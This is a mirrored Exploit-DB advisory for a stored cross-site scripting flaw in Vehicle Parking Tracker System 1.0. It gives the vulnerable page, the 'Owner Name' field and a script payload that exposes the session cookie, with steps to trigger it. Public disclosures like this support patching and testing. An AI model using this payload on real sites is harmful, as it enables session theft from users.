bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/49509.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

17 lines
No EOL
727 B
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Vehicle Parking Tracker System 1.0 - 'Owner Name' Stored Cross-Site Scripting
# Date: 2021-01-30
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
# Software: : Vehicle Parking Tracker System
# Version : 1.0
# Vulnerability Type: Cross-site Scripting
# Tested on Windows 10 XAMPP
# This application is vulnerable to Stored XSS vulnerability.
# Vulnerable script:
1) http://localhost/vpms/add-vehicle.php
# Vulnerable parameters: 'Owner Name'
# Payload used: ()"><script>alert(document.cookie)</script>
# POC: manage-incomingvehicle.php
# You will see your Javascript code executed.
Reference in a new issue View git blame Copy permalink